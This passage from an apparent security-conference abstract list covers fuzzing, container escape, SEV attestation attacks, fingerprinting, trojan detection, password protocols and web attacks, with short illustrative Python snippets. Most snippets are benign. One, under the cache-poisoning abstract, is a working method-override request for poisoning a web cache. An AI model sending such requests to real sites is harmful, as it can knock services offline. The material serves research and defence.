of routers. Our results show that cryptojacking through MITM attacks is highly lucrative, a factor of 30 more than previous attack vectors.

Network Hygiene, Incentives, and Regulation: Deployment of Source Address Validation in the Internet

The Spoofer project has collected data on the deployment and characteristics of IP source address validation on the Internet since 2005. Data from the project comes from participants who install an active probing client that runs in the background. The client automatically runs tests both periodically and when it detects a new network attachment point. We analyze the rich dataset of Spoofer tests in multiple dimensions: across time, networks, autonomous systems, countries, and by Internet protocol version. In our data for the year ending August 2019, at least a quarter of tested ASes did not filter packets with spoofed source addresses leaving their networks. We show that routers performing Network Address Translation do not always filter spoofed packets, as 6.4% of IPv4/24 tested in the year ending August 2019 did not filter. Worse, at least two thirds of tested ASes did not filter packets entering their networks with source addresses claiming to be from within their network that arrived from outside their network. We explore several approaches to encouraging remediation and the challenges of evaluating their impact. While we have been able to remediate 352 IPv4/24, we have found an order of magnitude more IPv4/24 that remain unremediated, despite myriad remediation strategies, with 21% unremediated for more than six months. Our analysis provides the most complete and confident picture to date of the Internet’s susceptibility to this long-standing vulnerability. Although there is no simple solution to address the remaining long-tail of unremediated networks, we conclude with a discussion of possible non-technical interventions, and demonstrate how the platform can support evaluation of the impact of such interventions over time.

Security Certification in Payment Card Industry: Testbeds, Measurements, and Recommendations

The massive payment card industry (PCI) involves various entities such as merchants, issuer banks, acquirer banks, and card brands. Ensuring security for all entities that process payment card information is a challenging task. The PCI Security Standards Council requires all entities to be compliant with the PCI Data Security Standard (DSS), which specifies a series of security requirements. However, little is known regarding how well PCI DSS is enforced in practice. In this paper, we take a measurement approach to systematically evaluate the PCI DSS certification process for e-commerce websites. We develop an e-commerce web application testbed, BuggyCart, which can flexibly add or remove 35 PCI DSS related vulnerabilities. Then we use the testbed to examine the capability and limitations of PCI scanners and the rigor of the certification process. We find that there is an alarming gap between the security standard and its real-world enforcement. None of the 6 PCI scanners we tested are fully compliant with the PCI scanning guidelines, issuing certificates to merchants that still have major vulnerabilities. To further examine the compliance status of real-world e-commerce websites, we build a new lightweight scanning tool named PciCheckerLite and scan 1,203 e-commerce websites across various business sectors. The results confirm that 86% of the websites have at least one PCI DSS violation that should have disqualified them as non-compliant. Our in-depth accuracy analysis also shows that PciCheckerLite’s output is more precise than w3af. We reached out to the PCI Security Council to share our research results to improve the enforcement in practice.

Session 3A: Fuzzing: Methods and Applications

Matryoshka: Fuzzing Deeply Nested Branches

Greybox fuzzing has made impressive progress in recent years, evolving from heuristics-based random mutation to approaches for solving individual branch constraints. However, they have difficulty solving path constraints that involve deeply nested conditional statements, which are common in image and video decoders, network packet analyzers, and checksum tools. We propose an approach for addressing this problem. First, we identify all the control flow-dependent conditional statements of the target conditional statement. Next, we select the taint flow-dependent conditional statements. Finally, we use three strategies to find an input that satisfies all conditional statements simultaneously. We implemented this approach in a tool called Matryoshka and compared its effectiveness on 13 open source programs against other state-of-the-art fuzzers. Matryoshka has significantly higher cumulative line and branch coverage than AFL, QSYM, and Angora. We manually classified the crashes found by Matryoshka into 41 unique new bugs and obtained 12 CVEs. Our evaluation also uncovered the key technique contributing to Matryoshka’s impressive performance: it collects only the nesting constraints that may make the target conditional statement unreachable, which greatly simplifies the path constraints that it has to solve.
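
A toy illustration, in Python rather than the C programs the paper targets, of the deeply nested, input-dependent branching that random mutation almost never penetrates; every nesting constraint must hold at once to reach the innermost code:

```python
def parse(data: bytes):
    # Each inner branch is control-flow dependent on the outer ones, so an
    # input must satisfy magic bytes, length field, and checksum together.
    if len(data) >= 8:
        if data[:4] == b"IMG!":                                    # magic bytes
            if int.from_bytes(data[4:6], "big") == len(data) - 8:  # length field
                if sum(data[8:]) % 256 == data[6]:                 # checksum byte
                    raise RuntimeError("deeply nested bug reached")

crash = b"IMG!" + b"\x00\x02" + bytes([154]) + b"\x00" + b"OK"     # sum(b"OK") == 154
try:
    parse(crash)
except RuntimeError as e:
    print(e)   # all four constraints hold simultaneously
```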

Intriguer: Field-Level Constraint Solving for Hybrid Fuzzing

Hybrid fuzzing, which combines fuzzing and concolic execution, is promising in light of the recent performance improvements in concolic engines. We have observed that there is room for further improvement: symbolic emulation is still slow, unnecessary constraints dominate solving time, resources are overly allocated, and hard-to-trigger bugs are missed. To address these problems, we present a new hybrid fuzzer named Intriguer. The key idea of Intriguer is field-level constraint solving, which optimizes symbolic execution with field-level knowledge. Intriguer performs instruction-level taint analysis and records execution traces without data transfer instructions like mov. Intriguer then reduces the execution traces for tainted instructions that accessed a wide range of input bytes, and infers input fields to build field transition trees. With these optimizations, Intriguer can efficiently perform symbolic emulation for more relevant instructions and invoke a solver for complicated constraints only. Our evaluation results indicate that Intriguer outperforms the state-of-the-art fuzzers: Intriguer found all the bugs in the LAVA-M(5h) benchmark dataset for ground truth performance, and also discovered 43 new security bugs in seven real-world programs. We reported the bugs and received 23 new CVEs.

Learning to Fuzz from Symbolic Execution with Application to Smart Contracts

Fuzzing and symbolic execution are two complementary techniques for discovering software vulnerabilities. Fuzzing is fast and scalable, but can be ineffective when it fails to randomly select the right inputs. Symbolic execution is thorough but slow and often does not scale to deep program paths with complex path conditions. In this work, we propose to learn an effective and fast fuzzer from symbolic execution, by phrasing the learning task in the framework of imitation learning. During learning, a symbolic execution expert generates a large number of quality inputs improving coverage on thousands of programs. Then, a fuzzing policy, represented with a suitable architecture of neural networks, is trained on the generated dataset. The learned policy can then be used to fuzz new programs. We instantiate our approach to the problem of fuzzing smart contracts, a domain where contracts often implement similar functionality (facilitating learning) and security is of utmost importance. We present an end-to-end system, ILF (for Imitation Learning based Fuzzer), and an extensive evaluation over >18K contracts. Our results show that ILF is effective: (i) it is fast, generating 148 transactions per second, (ii) it outperforms existing fuzzers (e.g., achieving 33% more coverage), and (iii) it detects more vulnerabilities than existing fuzzing and symbolic execution tools for Ethereum.

Session 5C: Cloud Security II

Houdini’s Escape: Breaking the Resource Rein of Linux Control Groups

Linux Control Groups, i.e., cgroups, are the key building blocks to enable operating-system-level containerization. The cgroups mechanism partitions processes into hierarchical groups and applies different controllers to manage system resources, including CPU, memory, block I/O, etc. Newly spawned child processes automatically copy cgroups attributes from their parents to enforce resource control. Unfortunately, inherited cgroups confinement via process creation does not always guarantee consistent and fair resource accounting. In this paper, we devise a set of exploiting strategies to generate out-of-band workloads via de-associating processes from their original process groups. The system resources consumed by such workloads will not be charged to the appropriate cgroups. To further demonstrate the feasibility, we present five case studies within Docker containers to demonstrate how to break the resource rein of cgroups in realistic scenarios. Even worse, by exploiting those cgroups’ insufficiencies in a multi-tenant container environment, an adversarial container is able to greatly amplify the amount of consumed resources, significantly slow-down other containers on the same host, and gain extra unfair advantages on the system resources. We conduct extensive experiments on both a local testbed and an Amazon EC2 cloud dedicated server. The experimental results demonstrate that a container can consume system resources (e.g., CPU) as much as 200× of its limit, and reduce both computing and I/O performance of particular workloads in other co-resident containers by 95%.

Insecure Until Proven Updated: Analyzing AMD SEV’s Remote Attestation

Cloud computing is one of the most prominent technologies to host Internet services that unfortunately leads to an increased risk of data theft. Customers of cloud services have to trust the cloud providers, as they control the building blocks that form the cloud. This includes the hypervisor enabling the sharing of a single hardware platform among multiple tenants. Executing in a higher-privileged CPU mode, the hypervisor has direct access to the memory of virtual machines. While data at rest can be protected using well-known disk encryption methods, data residing in main memory is still threatened by a potentially malicious cloud provider. AMD Secure Encrypted Virtualization (SEV) claims a new level of protection in such cloud scenarios. AMD SEV encrypts the main memory of virtual machines with VM-specific keys, thereby denying the higher-privileged hypervisor access to a guest’s memory. To enable the cloud customer to verify the correct deployment of his virtual machine, SEV additionally introduces a remote attestation protocol. This protocol is a crucial component of the SEV technology that can prove that SEV protection is in place and that the virtual machine was not subject to manipulation. This paper analyzes the firmware components that implement the SEV remote attestation protocol on the current AMD Epyc Naples CPU series. We demonstrate that it is possible to extract critical CPU-specific keys that are fundamental for the security of the remote attestation protocol. Building on the extracted keys, we propose attacks that allow a malicious cloud provider a complete circumvention of the SEV protection mechanisms. Although the underlying firmware issues were already fixed by AMD, we show that the current series of AMD Epyc CPUs, i.e., the Naples series, does not prevent the installation of previous firmware versions. We show that the severity of our proposed attacks is very high as no purely software-based mitigations are possible. This effectively renders the SEV technology on current AMD Epyc CPUs useless when confronted with an untrusted cloud provider. To overcome these issues, we also propose robust changes to the SEV design that allow future generations of the SEV technology to mitigate the proposed attacks.

Session 5E: Fingerprinting

Triplet Fingerprinting: More Practical and Portable Website Fingerprinting with N-shot Learning

Website Fingerprinting (WF) attacks pose a serious threat to users’ online privacy, including for users of the Tor anonymity system. By exploiting recent advances in deep learning, WF attacks like Deep Fingerprinting (DF) have reached up to 98% accuracy. The DF attack, however, requires large amounts of training data that needs to be updated regularly, making it less practical for the weaker attacker model typically assumed in WF. Moreover, research on WF attacks has been criticized for not demonstrating attack effectiveness under more realistic and more challenging scenarios. Most research on WF attacks assumes that the testing and training data have similar distributions and are collected from the same type of network at about the same time. In this paper, we examine how an attacker could leverage N-shot learning—a machine learning technique requiring just a few training samples to identify a given class—to reduce the effort of gathering and training with a large WF dataset as well as mitigate the adverse effects of dealing with different network conditions. In particular, we propose a new WF attack called Triplet Fingerprinting (TF) that uses triplet networks for N-shot learning. We evaluate this attack in challenging settings such as where the training and testing data are collected multiple years apart on different networks, and we find that the TF attack remains effective in such settings with 85% accuracy or better. We also show that the TF attack is effective in the open world and outperforms traditional transfer learning. On top of that, the attack requires only five examples to recognize a website, making it dangerous in a wide variety of scenarios where gathering and training on a complete dataset would be impractical.
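
The core of the attack is an embedding trained with a triplet objective; a minimal PyTorch sketch with random tensors standing in for traffic traces (real traces would be direction and timing features):

```python
import torch
import torch.nn as nn

embed = nn.Sequential(nn.Linear(5000, 128))   # stand-in feature extractor for a trace
loss_fn = nn.TripletMarginLoss(margin=1.0)

# anchor/positive: two visits to the same site; negative: a different site
anchor, positive, negative = (torch.rand(32, 5000) for _ in range(3))
loss = loss_fn(embed(anchor), embed(positive), embed(negative))
loss.backward()   # at attack time, classify a trace by its nearest site embedding
```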

DeMiCPU: Device Fingerprinting with Magnetic Signals Radiated by CPU

With the widespread use of smart devices, device authentication has received much attention. One popular method for device authentication is to utilize internally-measured device fingerprints, such as device ID, software or hardware-based characteristics. In this paper, we propose DeMiCPU, a stimulation-response-based device fingerprinting technique that relies on externally-measured information, i.e., magnetic induction (MI) signals emitted from the CPU module that consists of the CPU chip and its affiliated power supply circuits. The key insight of DeMiCPU is that hardware discrepancies essentially exist among CPU modules and thus the corresponding MI signals make promising device fingerprints, which are difficult to modify or mimic. We design a stimulation and a discrepancy extraction scheme and evaluate them with 90 mobile devices, including 70 laptops (among which 30 are of totally identical CPU and operating system) and 20 smartphones. The results show that DeMiCPU can achieve 99.1% precision and recall on average, and 98.6% precision and recall for the 30 identical devices, with a fingerprinting time of 0.6 s. In addition, the performance can be further improved to 99.9% with multi-round fingerprinting.

Session 6B: ML Security II

QUOTIENT: Two-Party Secure Neural Network Training and Prediction

Recently, there has been a wealth of effort devoted to the design of secure protocols for machine learning tasks. Much of this is aimed at enabling secure prediction from highly-accurate Deep Neural Networks (DNNs). However, as DNNs are trained on data, a key question is how such models can also be trained securely. The few prior works on secure DNN training have focused either on designing custom protocols for existing training algorithms, or on developing tailored training algorithms and then applying generic secure protocols. In this work, we investigate the advantages of designing training algorithms alongside a novel secure protocol, incorporating optimizations on both fronts. We present QUOTIENT, a new method for discretized training of DNNs, along with a customized secure two-party protocol for it. QUOTIENT incorporates key components of state-of-the-art DNN training such as layer normalization and adaptive gradient methods, and improves upon the state-of-the-art in DNN training in two-party computation. Compared to prior work, we obtain an improvement of 50X in WAN time and 6% in absolute accuracy.

Quantitative Verification of Neural Networks and Its Security Applications

Neural networks are increasingly employed in safety-critical domains. This has prompted interest in verifying or certifying logically encoded properties of neural networks. Prior work has largely focused on checking existential properties, wherein the goal is to check whether there exists any input that violates a given property of interest. However, neural network training is a stochastic process, and many questions arising in their analysis require probabilistic and quantitative reasoning, i.e., estimating how many inputs satisfy a given property. To this end, our paper proposes a novel and principled framework for quantitative verification of logical properties specified over neural networks. Our framework is the first to provide PAC-style soundness guarantees, in that its quantitative estimates are within a controllable and bounded error from the true count. We instantiate our algorithmic framework by building a prototype tool called NPAQ that enables checking rich properties over binarized neural networks. We show how emerging security analyses can utilize our framework in 3 applications: quantifying robustness to adversarial inputs, efficacy of trojan attacks, and fairness/bias of given neural networks.
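
For a feel of the PAC-style guarantee, here is a Monte-Carlo estimator with a Hoeffding-style sample bound. Note this additive-error sampling is only a stand-in for NPAQ's actual approach (approximate model counting over binarized networks); the shape of the (ε, δ) guarantee is what it illustrates.

```python
import math
import random

def pac_estimate(property_holds, eps=0.05, delta=0.01):
    """Estimate Pr[property] within +/- eps with probability >= 1 - delta."""
    n = math.ceil(math.log(2 / delta) / (2 * eps ** 2))   # Hoeffding sample count
    hits = sum(property_holds(random.random()) for _ in range(n))
    return hits / n

# toy "property": fraction of inputs x in [0, 1] with x < 0.3
print(pac_estimate(lambda x: x < 0.3))   # ~0.3, with a quantified error bound
```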

ABS: Scanning Neural Networks for Back-doors by Artificial Brain Stimulation

This paper presents a technique to scan neural network based AI models to determine if they are trojaned. Pre-trained AI models may contain back-doors that are injected through training or by transforming inner neuron weights. These trojaned models operate normally when regular inputs are provided, and mis-classify to a specific output label when the input is stamped with some special pattern called a trojan trigger. We develop a novel technique that analyzes inner neuron behaviors by determining how output activations change when we introduce different levels of stimulation to a neuron. Neurons that substantially elevate the activation of a particular output label regardless of the provided input are considered potentially compromised. The trojan trigger is then reverse-engineered through an optimization procedure using the stimulation analysis results, to confirm that a neuron is truly compromised. We evaluate our system ABS on 177 trojaned models that are trojaned with various attack methods that target both the input space and the feature space, and have various trojan trigger sizes and shapes, together with 144 benign models that are trained with different data and initial weight values. These models belong to 7 different model structures and 6 different datasets, including some complex ones such as ImageNet, VGG-Face and ResNet110. Our results show that ABS is highly effective, achieving over a 90% detection rate in most cases (and often 100%), when only one input sample is provided for each output label. It substantially outperforms the state-of-the-art technique Neural Cleanse, which requires many input samples and small trojan triggers to achieve good performance.

Lifelong Anomaly Detection Through Unlearning

Anomaly detection is essential to ensuring system security and reliability. Powered by constantly generated system data, deep learning has been found both effective and flexible to use, with its ability to extract patterns without much domain knowledge. Existing anomaly detection research focuses on a scenario referred to as zero-positive, which means that the detection model is trained only on normal (i.e., negative) data. In a real application scenario, there may be additional manually inspected positive data provided after the system is deployed. We refer to this scenario as lifelong anomaly detection. However, we find that existing approaches cannot easily incorporate such new knowledge to improve system performance. In this work, we are the first to explore the lifelong anomaly detection problem, and propose novel approaches to handle the corresponding challenges. In particular, we propose a framework called unlearning, which can effectively correct the model when a false negative (or a false positive) is labeled. To this end, we develop several novel techniques to tackle two challenges referred to as exploding loss and catastrophic forgetting. In addition, we abstract a theoretical framework based on generative models. Under this framework, our unlearning approach can be presented in a generic way and applied to most zero-positive deep learning-based anomaly detection algorithms to turn them into corresponding lifelong anomaly detection solutions. We evaluate our approach using two state-of-the-art zero-positive deep learning anomaly detection architectures and three real-world tasks. The results show that the proposed approach is able to significantly reduce the number of false positives and false negatives through unlearning.

Session 6E: Passwords and Accounts

How to (not) Share a Password: Privacy Preserving Protocols for Finding Heavy Hitters with Adversarial Behavior

Bad choices of passwords were and are a pervasive problem. Users choosing weak passwords do not only compromise themselves, but the whole ecosystem. E.g., common and default passwords in IoT devices were exploited by hackers to create botnets and mount severe attacks on large Internet services, such as the Mirai botnet DDoS attack. We present a method to help protect the Internet from such large scale attacks. Our method enables a server to identify popular passwords (heavy hitters), and publish a list of over-popular passwords that must be avoided. This filter ensures that no single password can be used to compromise a large percentage of the users. The list is dynamic and can be changed as new users are added or when current users change their passwords. We apply maliciously secure two-party computation and differential privacy to protect the users’ password privacy. Our solution does not require extra hardware or cost, and is transparent to the user. Our private heavy hitters construction is secure even against a malicious coalition of devices which tries to manipulate the protocol to hide the popularity of some password that the attacker is exploiting. It also ensures differential privacy under continual observation of the blacklist as it changes over time. As a reality check we conducted three tests: computed the guarantees that the system provides with respect to a few publicly available databases, ran full simulations on those databases, and implemented and analyzed a proof-of-concept on an IoT device. Our construction can also be used in other settings to privately learn heavy hitters in the presence of an active malicious adversary. E.g., learning the most popular sites accessed by the Tor network.

Protocols for Checking Compromised Credentials

To prevent credential stuffing attacks, industry best practice now proactively checks if user credentials are present in known data breaches. Recently, some web services, such as HaveIBeenPwned (HIBP) and Google Password Checkup (GPC), have started providing APIs to check for breached passwords. We refer to such services as compromised credential checking (C3) services. We give the first formal description of C3 services, detailing different settings and operational requirements, and we give relevant threat models. One key security requirement is the secrecy of a user’s passwords that are being checked. Current widely deployed C3 services have the user share a small prefix of a hash computed over the user’s password. We provide a framework for empirically analyzing the leakage of such protocols, showing that in some contexts knowing the hash prefixes leads to a 12x increase in the efficacy of remote guessing attacks. We propose two new protocols that provide stronger protection for users’ passwords, implement them, and show experimentally that they remain practical to deploy.
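
The currently deployed hash-prefix protocol the paper analyzes is easy to exercise: the client reveals only the first five hex characters of SHA-1(password) to HIBP's range API and matches the suffix locally. The paper's point is that even this prefix leaks enough to materially help remote guessing.

```python
import hashlib
import requests

def check_hibp(password):
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]   # only the 5-char prefix leaves the client
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}")
    for line in resp.text.splitlines():
        candidate, count = line.split(":")
        if candidate == suffix:
            return int(count)                 # breach occurrences of this password
    return 0

print(check_hibp("password123"))
```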

User Account Access Graphs

The primary authentication method for a user account is rarely the only way to access that account. Accounts can often be accessed through other accounts, using recovery methods, password managers, or single sign-on. This increases each account’s attack surface, giving rise to subtle security problems. These problems cannot be detected by considering each account in isolation, but require analyzing the links between a user’s accounts. Furthermore, to accurately assess the security of accounts, the physical world must also be considered. For example, an attacker with access to a physical mailbox could obtain credentials sent by post.

Despite the manifest importance of understanding these interrelationships and the security problems they entail, no prior methods exist to perform an analysis thereof in a precise way. To address this need, we introduce account access graphs, the first formalism that enables a comprehensive modeling and analysis of a user’s entire setup, incorporating all connections between the user’s accounts, devices, credentials, keys, and documents. Account access graphs support systematically identifying both security vulnerabilities and lockout risks in a user’s accounts. We give analysis algorithms and illustrate their effectiveness in a case study, where we automatically detect significant weaknesses in a user’s setup and suggest improvement options.
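
A toy version of the formalism: each account lists access methods (an OR over methods, an AND over the credentials inside one method), and a fixpoint from an attacker's starting assets yields everything reachable. The accounts and credentials below are invented for illustration.

```python
# account -> list of access methods; each method is a set that must be fully owned
access = {
    "email": [{"email_pw"}, {"phone"}],   # password OR phone-based recovery
    "bank":  [{"bank_pw", "phone"}],      # password AND SMS second factor
    "phone": [{"phone_pin"}],
}

def reachable(start):
    owned = set(start)
    changed = True
    while changed:
        changed = False
        for node, methods in access.items():
            if node not in owned and any(m <= owned for m in methods):
                owned.add(node)
                changed = True
    return owned

print(reachable({"phone_pin", "bank_pw"}))  # phone access cascades to email and bank
```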

Detecting Fake Accounts in Online Social Networks at the Time of Registrations

Online social networks are plagued by fake information. In particular, using massive fake accounts (also called Sybils), an attacker can disrupt the security and privacy of benign users by spreading spam, malware, and disinformation. Existing Sybil detection methods rely on rich content, behavior, and/or social graphs generated by Sybils. The key limitation of these methods is that they incur significant delays in catching Sybils, i.e., Sybils may have already performed many malicious activities when being detected. In this work, we propose Ianus, a Sybil detection method that leverages account registration information. Ianus aims to catch Sybils immediately after they are registered. First, using a real-world registration dataset with labeled Sybils from WeChat (the largest online social network in China), we perform a measurement study to characterize the registration patterns of Sybils and benign users. We find that Sybils tend to have synchronized and abnormal registration patterns. Second, based on our measurement results, we model Sybil detection as a graph inference problem, which allows us to integrate heterogeneous features. In particular, we extract synchronization and anomaly based features for each pair of accounts, use the features to build a graph in which Sybils are densely connected with each other while a benign user is isolated or sparsely connected with other benign users and Sybils, and finally detect Sybils via analyzing the structure of the graph. We evaluate Ianus using real-world registration datasets of WeChat. Moreover, WeChat has deployed Ianus on a daily basis, i.e., WeChat uses Ianus to analyze newly registered accounts on each day and detect Sybils. Via manual verification by the WeChat security team, we find that Ianus can detect around 400K Sybils per million newly registered accounts each day and achieve a precision of over 96% on average.
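
The graph-inference step can be sketched with NetworkX: link account pairs whose registration features look synchronized and anomalous, then read off dense components as Sybil candidates. The features, threshold, and accounts below are invented; Ianus itself uses richer pairwise features and graph analysis.

```python
import networkx as nx

regs = {                       # account -> (timestamp, ip_prefix, device_model)
    "a1": (1000, "1.2.3", "X1"), "a2": (1003, "1.2.3", "X1"),
    "a3": (1005, "1.2.3", "X1"), "b1": (5000, "9.8.7", "Y2"),
}

def similar(u, v):
    (t1, ip1, d1), (t2, ip2, d2) = regs[u], regs[v]
    return abs(t1 - t2) < 60 and ip1 == ip2 and d1 == d2  # synchronized, same profile

g = nx.Graph()
g.add_nodes_from(regs)
g.add_edges_from((u, v) for u in regs for v in regs if u < v and similar(u, v))

sybil_clusters = [c for c in nx.connected_components(g) if len(c) > 2]
print(sybil_clusters)          # [{'a1', 'a2', 'a3'}]: densely connected registrations
```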

Session 8A: Attack II

Gollum: Modular and Greybox Exploit Generation for Heap Overflows in Interpreters

We present the first approach to automatic exploit generation for heap overflows in interpreters. It is also the first approach to exploit generation in any class of program that integrates a solution for automatic heap layout manipulation. At the core of the approach is a novel method for discovering exploit primitives—inputs to the target program that result in a sensitive operation, such as a function call or a memory write, utilizing attacker-injected data. To produce an exploit primitive from a heap overflow vulnerability, one has to discover a target data structure to corrupt, ensure an instance of that data structure is adjacent to the source of the overflow on the heap, and ensure that the post-overflow corrupted data is used in a manner desired by the attacker. Our system addresses all three tasks in an automatic, greybox, and modular manner. Our implementation is called GOLLUM, and we demonstrate its capabilities by producing exploits from 10 unique vulnerabilities in the PHP and Python interpreters, 5 of which do not have existing public exploits.

SLAKE: Facilitating Slab Manipulation for Exploiting Vulnerabilities in the Linux Kernel

To determine the exploitability of a kernel vulnerability, a security analyst usually has to manipulate the slab and thus demonstrate the capability of obtaining the control over a program counter or performing privilege escalation. However, this is a lengthy process because (1) an analyst typically has no clue about what objects and system calls are useful for kernel exploitation and (2) he lacks the knowledge of manipulating a slab and obtaining the desired layout. In the past, researchers have proposed various techniques to facilitate exploit development. Unfortunately, none of them can be easily applied to address these challenges. On the one hand, this is because of the complexity of the Linux kernel. On the other hand, this is due to the dynamic and non-deterministic nature of slab variations. In this work, we tackle the challenges above from two perspectives. First, we use static and dynamic analysis techniques to explore the kernel objects, and the corresponding system calls useful for exploitation. Second, we model commonly-adopted exploitation methods and develop a technical approach to facilitate the slab layout adjustment. By extending LLVM as well as Syzkaller, we implement our techniques and name their combination SLAKE. We evaluate SLAKE by using 27 real-world kernel vulnerabilities, demonstrating that it could not only diversify the ways to perform kernel exploitation but also sometimes escalate the exploitability of kernel vulnerabilities.

Session 8E: Web Security

HideNoSeek: Camouflaging Malicious JavaScript in Benign ASTs

In the malware field, learning-based systems have become popular to detect new malicious variants. Nevertheless, attackers with specific and internal knowledge of a target system may be able to produce input samples which are misclassified. In practice, the assumption of strong attackers is not realistic as it implies access to insider information. We instead propose HideNoSeek, a novel and generic camouflage attack, which evades the entire class of detectors based on syntactic features, without needing any information about the system it is trying to evade. Our attack consists of changing the constructs of malicious JavaScript samples to reproduce a benign syntax. For this purpose, we automatically rewrite the Abstract Syntax Trees (ASTs) of malicious JavaScript inputs into existing benign ones. In particular, HideNoSeek uses malicious seeds and searches for isomorphic subgraphs between the seeds and traditional benign scripts. Specifically, it replaces benign sub-ASTs with their malicious equivalents (same syntactic structure) and adjusts the benign data dependencies, without changing the AST, so that the malicious semantics is kept. In practice, we leveraged 23 malicious seeds to generate 91,020 malicious scripts, which perfectly reproduce ASTs of Alexa top 10,000 web pages. Also, we can produce on average 14 different malicious samples with the same AST as each Alexa top 10 web page. Overall, a standard trained classifier has 99.98% false negatives with HideNoSeek inputs, while a classifier trained on such samples has over 88.74% false positives, rendering the targeted static detectors unreliable.
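
The isomorphic-subtree idea is easy to demonstrate on Python ASTs in place of JavaScript ones: index subtrees by a purely syntactic shape signature, and two semantically unrelated snippets collide.

```python
import ast

def shape(node):
    """Node types only: names and constants are ignored, mirroring
    detectors that rely on syntactic features."""
    return (type(node).__name__,
            tuple(shape(c) for c in ast.iter_child_nodes(node)))

benign = ast.parse("total = price * quantity")
malicious = ast.parse("payload = stage1 * stage2")   # same syntax, different semantics

print(shape(benign) == shape(malicious))             # True: syntactically indistinguishable
```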

Your Cache Has Fallen: Cache-Poisoned Denial-of-Service Attack ✔👍

Web caching enables the reuse of HTTP responses with the aim to reduce the number of requests that reach the origin server, the volume of network traffic resulting from resource requests, and the user-perceived latency of resource access. For these reasons, a cache is a key component in modern distributed systems as it enables applications to scale at large. In addition to optimizing performance metrics, caches promote additional protection against Denial of Service (DoS) attacks. In this paper we introduce and analyze a new class of web cache poisoning attacks. By provoking an error on the origin server that is not detected by the intermediate caching system, the cache gets poisoned with the server-generated error page and instrumented to serve this useless content instead of the intended one, rendering the victim service unavailable. In an extensive study of fifteen web caching solutions, we analyzed the negative impact of the Cache-Poisoned DoS (CPDoS) attack, as we coined it. We show the practical relevance by identifying one proxy cache product and five CDN services that are vulnerable to CPDoS. Amongst them are prominent solutions that in turn cache high-value websites. The consequences are severe as one simple request is sufficient to paralyze a victim website within a large geographical region. The awareness of the newly introduced CPDoS attack is highly valuable for researchers for obtaining a comprehensive understanding of causes and countermeasures as well as practitioners for implementing robust and secure distributed systems.
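
One of the paper's CPDoS variants, HTTP Method Override (HMO), fits in a few lines: a header that caches ignore but some origins honour makes the origin return an error page, which the cache then stores and serves to everyone. The URL is a placeholder; run such probes only against systems you own.

```python
import requests

url = "https://victim.example/resource"             # placeholder target

# The cache keys on "GET /resource", but an origin honouring the
# override treats the request as DELETE and emits an error page.
poison = requests.get(url, headers={"X-HTTP-Method-Override": "DELETE"})
print(poison.status_code)                           # e.g. 404/405 from the origin

check = requests.get(url)                           # clean follow-up request
print(check.status_code, check.headers.get("X-Cache"))  # error from cache => poisoned
```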

Session 9A: User Study

Passwords are an often unavoidable authentication mechanism, despite the availability of alternative means. In the case of smartphones, usability problems are aggravated because interaction happens through small screens and multilayer keyboards. While password managers (PMs) can improve this situation and contribute to hardening security, their adoption is far from widespread. To understand the underlying reasons, we conducted the first empirical usability study of mobile PMs, covering both quantitative and qualitative evaluations. Our findings show that popular PMs are barely acceptable according to the standard System Usability Scale, and that there are three key areas for improvement: integration with external applications, security, and user guidance and interaction. We build on the collected evidence to suggest recommendations that can fill this gap.

Matched and Mismatched SOCs: A Qualitative Study on Security Operations Center Issues

Organizations, such as companies and governments, created Security Operations Centers (SOCs) to defend against computer security attacks. SOCs are central defense groups that focus on security incident management with capabilities such as monitoring, preventing, responding, and reporting. They are one of the most critical components of a modern organization’s defense. Despite their critical importance to organizations, and the high frequency of reported security incidents, only a few research studies focus on problems specific to SOCs. In this study, to understand and identify the issues of SOCs, we conducted 18 semi-structured interviews with SOC analysts and managers who work for organizations from different industry sectors. Through our analysis of the interview data, we identified technical and non-technical issues that exist in SOCs. Moreover, we found inherent disagreements between SOC managers and their analysts that, if not addressed, could entail a risk to SOC efficiency and effectiveness. We distill these issues into takeaways that apply both to future academic research and to SOC management. We believe that research should focus on improving the efficiency and effectiveness of SOCs.

A Usability Evaluation of Let’s Encrypt and Certbot: Usable Security Done Right?

The correct configuration of HTTPS is a complex set of tasks, which many administrators have struggled with in the past. Let’s Encrypt and Electronic Frontier Foundation’s Certbot aim to improve the TLS ecosystem by offering free trusted certificates (Let’s Encrypt) and by providing user-friendly support to configure and harden TLS (Certbot). Although adoption rates have increased, to date, there has been little scientific evidence of the actual usability and security benefits of this semi-automated approach. Therefore, we conducted a randomized control trial to evaluate the usability of Let’s Encrypt and Certbot in comparison to the traditional certificate authority approach. We performed a within-subjects lab study with 31 participants. The study sheds light on the security and usability enhancements that Let’s Encrypt and Certbot provide. We highlight how usability improvements aimed at administrators can have a large impact on security and discuss takeaways for Certbot and other security-related tasks that experts struggle with.

Session 9B: ML Security III

Seeing isn’t Believing: Towards More Robust Adversarial Attack Against Real World Object Detectors

Recently, Adversarial Examples (AEs) that deceive deep learning models have been a topic of intense research interest. Compared with the AEs in the digital space, the physical adversarial attack is considered a more severe threat to applications like face recognition in authentication, object detection in autonomous driving cars, etc. In particular, practically deceiving object detectors is more challenging since the relative position between the object and the detector may keep changing. Existing works attacking object detectors are still very limited in various scenarios, e.g., varying distance and angles, etc. In this paper, we presented systematic solutions to build robust and practical AEs against real world object detectors. Particularly, for Hiding Attack (HA), we proposed the feature-interference reinforcement (FIR) method and the enhanced realistic constraints generation (ERG) to enhance robustness, and for Appearing Attack (AA), we proposed the nested-AE, which combines two AEs together to attack object detectors at both long and short distances. We also designed diverse styles of AEs to make AA more surreptitious. Evaluation results show that our AEs can attack the state-of-the-art real-time object detectors (i.e., YOLO V3 and faster-RCNN) at a success rate of up to 92.4% with varying distance from 1m to 25m and angles from -60° to 60°. Our AEs are also demonstrated to be highly transferable, capable of attacking another three state-of-the-art black-box models with high success rate.

AdVersarial: Perceptual Ad Blocking meets Adversarial Machine Learning

